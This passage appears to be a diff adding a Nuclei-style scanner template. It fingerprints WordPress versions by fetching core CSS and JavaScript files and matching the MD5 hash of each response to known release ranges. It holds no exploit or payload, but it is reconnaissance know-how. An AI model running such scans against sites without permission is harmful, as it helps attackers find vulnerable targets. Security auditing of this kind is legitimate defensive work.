"(\"700790d0f345446ccaf08b3460fe8351\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - 
"(\"d5ddd9e2f523fc6d9aa0293c8bd2391d\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"12ea589ec56cee96417b3af756d724b4\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"eef9e9c791a2a8250df76fcbfe5d17bd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5bdad071f9e7cfe1a7a92a62d758bbf1\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"71cdb07b51db8a1db6c2d3f08a0367fa\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fd2b6396366e80b8299b52064d898c0a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"601bb2a5a5eea3590273be36a7df9669\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"a5292a41fb788a8a72e883c4c062beaa\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"582c0c210600f719b442959112412c94\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9dadeed9e3d6c25f0a61f15f5187933a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2eccfd95805b80a6a072a4fff8bfd4b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"9a0a057b0459eabbdddead7a1e477eec\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"44bafdf96fbd98c93ca4a6564cbe7e93\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"c1abb7c12d4e54061e011ca25c524ed8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0528f3a942a205c3b428c17a04b073f8\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"a66b5870f5abf95219e4fde453577ea7\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"a67484679e8fd85db53b9619a2ac8f85\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"faf10f604c6bd3e8e2eb40324b88182e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ce3f414694b2c845341d2e3d69130267\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0f2c9837f4d58bec62e54c49bc2b7794\" == md5(body))" + - type: 
dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bf0ab9d631a3b25394db5d04866fc1aa\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"828f5d1cd3443c5976270143e77cadf4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"8658229ae2ce25fd13ff08548675d8ee\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"77beb61918ea32751dac643426d8f3d5\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9071b556370c3845075580318a236b2f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"41554444c0f5476bffaeb6a79961f7ea\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ca0d7958e9d46e58cf9d41f957ec91c8\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c6a5aa2e29f32f44bdce4742fca8f2bb\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"93b7262b1516cf0ec3d539b78c8142e1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b36cac1d32f8b0416c4b6235ac01cd37\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1d76230edc8f2fddd8983c082db89d8b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f82245973ba3fd29d15126f8589f00ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes-rtl.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"9c4fafeae99d7503e0bee7fb9217c8e9\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"f5a99b541f512e2c0395d7d2b40adb34\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"46c7eef970445884324c035f739ca63a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"dcaa4244b0f2d289a78e99d3b15d0030\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"df4b24fdec390975a02a7603fafc35b9\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"2b3dd6296037fabf5838dbb7abaf097a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"5ff3626ce33e65913c4d8953959aa520\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - 
"(\"5976bde31a300bab3a5d50f41b272b61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d74ee2f93a19ac860cacb90596dcb490\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cdcc90f54b768a8cd5716b65fff9d435\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"59f537df17030e22fd1e5f56b4d79c84\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"546c91b261d6c87cb01db2444d599cad\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9811db0e32a5b4eec31edd57406b1273\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d855dc46a4c9159753cae0ffd6940c32\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d638ef49ef6db468d4ee59d08c1eaeb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes-rtl.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ac269b6795e49f5954f2ba2acb9794a4\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"8f0a90ccd54ad9f8b584a77ad5fc4df4\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b845e2804487a2c5a4b64938a6c431e1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3b10683d99f04c4d4a33ed92eda6a1de\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"092db96e6dbef112252d3faf4bf955ad\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"9244c8ce5e9d98581459de46b8b1bcd1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"169672ec8c16e26871cd0f2374586204\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c69c734910d5078b179e84f8bf99e5d6\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ed00d87745e51769e94fb921930d997d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4a121a5c6d72c6506750149b8e20ca56\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"80aac0d388f112376bcdb5bd3539d6e5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6c675d2f6d9a5c8c81a1ad8bb2f3a790\" == 
md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"400ee8016213e3c3d97bb05fcb49cdb5\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3d6bf238e618acab0ba06717265a5968\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e37a10fd50d81ece6f710c45b3fa1a04\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"032493bd3c26ff357c718c5ee666559e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"fb563bca5ee580768536fd79f2fe0099\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"1c7c4b87a701db41ce0aabd9588d8c17\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"702259ee1857d24d8fd20e3a9f382f4a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"32ff26d078f6a954a639c00b8ca5f603\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ca3bd63183f371d0a5b7d675605b41ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d013264ad3f438d142233a254b1117d7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"66921114b83a2e737e69f2847b4c9cf3\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"790856d6a811fc7fe402923db7b6a5b4\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"325a6c7b04fbd7cf907f383aa5f4de38\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d7a258aa3ccead8b55aab1b671e065e5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e633153dadc9e4941e4f488d3aa837a2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"78ace8b0870478e309e40a7bbf5e3389\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c175f45d5829c12ac0be14efac8bb4c7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"276f2225f21976d22740e82215494856\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d37ca4ce0e8e1250bb906e69312e665f\" == md5(body))" + - type: dsl + name: 3.9.1 - 
3.9.33 + dsl: + - "(\"f8ab93f031c0321ede4c47e7c3089da6\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"ebc9181357a52cab8fab57d71c425834\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"11fac912b46d92d88bd5df1878a2c15d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"937b3ac77d948c34e7dbe07fefdc624d\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"4c1a60281755a58f80a47e0813c41eaa\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"1e90009269f457bd921c66553d228318\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5d6f193d1f5c5adc2323941754c753bc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3dbfa38d02be94fdcc892f3a302ac9b9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f4eea5b8a4b0bc5012d0bc602e7ecd13\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0bad85ae8ccab5915c8ec59b6d0e6c90\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"c4faa8b5b7b501ba22c6bb57f156a1c9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b612fa58efa9719e30e8828cf5b7d7cb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d99ffda66449ebd500441480e4b9a527\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"64c96fc90711e9e0fc3603be28af7127\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"47752271f64a9450264075c3388f6c6f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"7ee4c4a582042409d1324354271dd33a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3f3b7c76cbd5221c72b4eee6c87a9308\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8ed5bd4a43ca6575d2df30bb88cffb91\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"61c801bba389554bae370d73246f94fa\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - 
"(\"76fce113f718ef60c9931f72c13d5f9a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"6a2feae9bdc28933566c060a1f464556\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d155c4000f10a61e0793569fcb399998\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"331b72eb0cd5c3c8cc46645befabfdd2\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"12f61c063d0234dbafb11a1c59248249\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"f7ac8314d571b1c198d0efff920d2bb2\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"38bd662ed5c53ef1b4be39c239bb3c19\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c7d9a48cde3ec1d9368c4a25b9d9fb5f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"7103b0149a4e22079def0482495cee6e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"872a1bbe2da03464ac6d8ca1c153a3d5\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"af625d635badd366bc7f303a8dd31f8c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e07102630daf98355cb00ed5c073dfa7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a6628e1a25bcafa09aa8b162720ed4b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"321a6177a67ded013d09dbf01acfc720\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"ecb1fcf9fd153be961a297b91d5dbfe5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"76ca9c78f6d0c3067f1675647bee0e11\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b6926672577e63afe9b7d0b4aaa4582a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"85423c8fe3301819eb65ce6b293567e7\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"d8c9fc3fe6bcc0d3e421d07de6d0631a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"7af49f35c490a278b5d68fd14863fc2a\" == 
md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fb7105f56049ea9973bd87e921d05aa2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3ca933b7742a2c632bf36dd3b3fda0cd\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"282327fab3ae51f8d9388cd19ffa368f\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"b0d183adf2d3e85eae32e58276125e9d\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e358104efa34b7f5f6026d9dcaa746ae\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f67578c4abafa31a7df8ab3bb1915f3e\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"a547809c0643c57dc1c8d9250eb8c42e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3c097a0a654b8efcfa9ab5576fdce131\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"2c22663bfcbce25b9621d52d8b86b6cf\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e54ffaded9432c82c95b9a7a41ce2a7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"317de2d6d71ca4bd7be900f1441c205e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c74a0e67bc88bb7a74ca50ccf662d82f\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"a72bd32f3d21c3fcda385af3e8bff5e3\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"500f084226ee39c6b11b9974a65a32f2\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7860eb75440968af1348895c70aa596a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4830ad6b3e3a4090b20262815591a055\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"e9337ef831e8077f4eccc9db76c0db5d\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"b708d4c4a95584ed6d0fbe99398de717\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cfba250fba322ce18b32d62855fb192f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + 
dsl: + - "(\"550bf2c8d64a462cd0001b12ab69cef6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"38495c0fe98ea4771bd1ef698c67fe15\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"498eae5afa7050083856a248dcd22d99\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"322756eb9dfcfc64aafea511d272dd1b\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"8d6da8edc4399924c03d3ab0ece8a652\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"033d42e80b0fe67e673bff455ed0843e\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"2458095adb086c724eaa5b71e9b7e6be\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b5c008d615027d62aeaf41a230356c64\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"626baba6145c91db05e9e385fc0d218a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/edit.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1f444df7d07ce6cd93e33b6916ab2bf9\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"36beba49ddd70365704e68b6641cab63\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"8c4b91d038300235db9877d6a4196674\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"32637f3e54e917599672b3c1f00a2a81\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"70c2d4e3ef1aa9773b57a613e0f18688\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"efea55c81e3ea0ca09218e8b5f9afb4c\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"c57388a65dd7ec1756906163092fe189\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"28dd93cd05da310c09f74bc10291e1a4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"19349d4b01b6274f6acfe22728a11ba9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"048e675d19df066b8bbef9e3f47b50b5\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"6ace78179d1df3dc9b65b5184338332c\" == md5(body))" 
+ - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"36a7ea65791f3906b1df1a49f5a43d4c\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"13741ff4c641e3802162fa03fbd186a0\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"9bf6983d8457015564b150b4940448d5\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"7774dd0c0ffbbabb3f27bf90b63a20cf\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2d6edb6605a2cb8605fd40f47458410c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"909a82ec9008629769faa54d9e441da9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9ecc681f73ca68d4317b51cda7fcf7a6\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"db1fe8e4e2d28b34933170e7651d9c3e\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"aeab7c0cb90d81f8dde42cf7c0643977\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"071699af2261779b923ed5d35c2906d4\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"2500781d246925eb4f14a6806624b1ba\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"485de2b76d48a457394827f2f5c5e0fb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ab3c6775af462066bdb485407007a49b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e83fa02f4e7f2fad6a2908294ef48346\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"8ba30eea17f8edcad409260ad55cb71e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2831b769919d5f1425c37982fad9d04a\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"8d63d1b5d33ddb3ce802d4b3101eecb4\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8bd13d2d038f8a9bbae8b5224f7a6cf7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ffe89d1610b9548b2045b8287efc3a45\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + 
dsl: + - "(\"9628e175931f52fa66ba397e185108da\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9041980e0fcbd9eb534a350ddff07fd9\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"82eda7c0bf831b87fe258f3627733d62\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"0aabf147505c4f70b2118bf9f2cd441e\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"10cabe6e1dae0d377340a3b0f0702730\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"b37189d5961232b0dbe7dfd19b15f961\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"2d8e2c042b6c0ea040fa6442e5d10a14\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"6e250c8c021b3bda740e2abd0728685a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"39011c3ef4e410b2d90154e0f44c6fb2\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"e1b8555dd35d833a4233467e448a83fd\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"1dffc13554c171793366b66ab7abd3a4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d05ceec8b792484151ce78b2728ef8e8\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"e80a8800b4ffda0aa8ba31b72e88d32f\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"8668b09107e802713e02f84e800a37b3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"be60da41523426c0dda3214ea82e2e0d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji-loader.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"3c631f3faee929b38f97cf728a400838\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"c2da74cc961f02f8a1532b9ef4c49f6f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"1e34797cb4169e053e6d526294921d66\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1e775e7c758584bd7af7f718d09eec96\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"2d2731b03615ee79144b9259d94a2e1d\" 
== md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"4cac17278a207c14a58648c92b24e146\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"bc114c7b2bdddff03241f50f112cec68\" == md5(body))" + - type: dsl + name: 4.4.2 + dsl: + - "(\"59250ea877230734339b12588fb56929\" == md5(body))" + - type: dsl + name: 4.4.1 + dsl: + - "(\"248977111a79cdb3aed53f8262e3c7da\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"355049f99f0565be72e7a2b4dcfd5e5e\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.3.25 + dsl: + - "(\"d4a819f73ff1a4574a969c9e46d6f117\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"91852c46e229354898fcffb83eef84c9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"961d47e473a86475973713a54741fd33\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"2b204cc941a4670d627f549de9293d29\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"67225f16229b76c9f2a0c46a15182781\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"04696b6a36a295a5deaea186bb9afb6a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"0712b4b1e4761d9b32654d905e41a2e9\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"fe59084e6bc4be1624a6d93df4e63e17\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"90686eda3165dfdae88396b016ff53c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cabe11a63f5be3fb81358c6680a842ca\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"5986a1680538ac8e83d217027d57543f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"09850183c273d5d1281938b35481e499\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3e0522fdb4c11550a7466636acf5bb89\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"634f61086f99bacf674ec35b13a59d04\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 
+ dsl: + - "(\"72708014eb3072db16d015b5cb73b514\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"42a6a3be4f2f11208a281be9be203427\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"18cf2d8b6ef368cc26596b0a630142b5\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"c4661abb4164f292618baa46c3b04235\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"957349ba7cfc37f34ba6754dd351eb1b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"15c63a1f8a16d4ca851ee2f0ef50b976\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"7f8ecaf975c90333afdbfbb467d7117c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"eb6244e98261b7eca06d8d11cc9f28bf\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"1a0d15022c26abdfdb9448118662a825\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"af1bc6adf17f10ad34c9a0bd4c354df9\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"0433cc6b4967a15d2f6be5a92958b812\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4fbee54e4f5824b05f1269c562d1f860\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"85e7a165ac57ff9ef61a1886f3d50593\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"1e357122810800c44d1cbff5fda7747b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"f1651f06c741f9e429b84160be377ad9\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"95b81581a1a6a3dda3eb13deedb1545e\" 